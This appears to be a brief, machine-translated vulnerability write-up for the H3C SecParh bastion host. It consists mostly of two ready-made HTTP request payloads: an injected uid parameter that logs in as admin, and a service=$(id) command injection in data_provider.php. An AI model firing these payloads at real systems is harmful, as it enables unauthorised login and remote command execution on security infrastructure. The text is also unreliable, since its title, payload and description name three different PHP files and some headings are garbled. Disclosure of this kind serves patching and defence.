H3c Secparh Fortress Get_detail_view Php Any User Login Vulnerability
H3c Secparh Fortress Get_detail_view Php Any User Login Vulnerability
H3C SecParh Fortress get_detail_view.php Any user login vulnerability
Vulnerability Description
H3C SecParh Fortress data_provider.php There is a remote command execution vulnerability. The attacker can construct a special request execution command by logging in by any user or entering the background with an account password.
Vulnerability Impact
H3C SecParh Fortress
Network surveying and mapping
Vulnerability reappears
The login page is as follows
First get cookies through any user login
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(id)&identity_cond=&query_type=all&format=json&browse=true
This post is licensed under CC BY 4.0 by the author.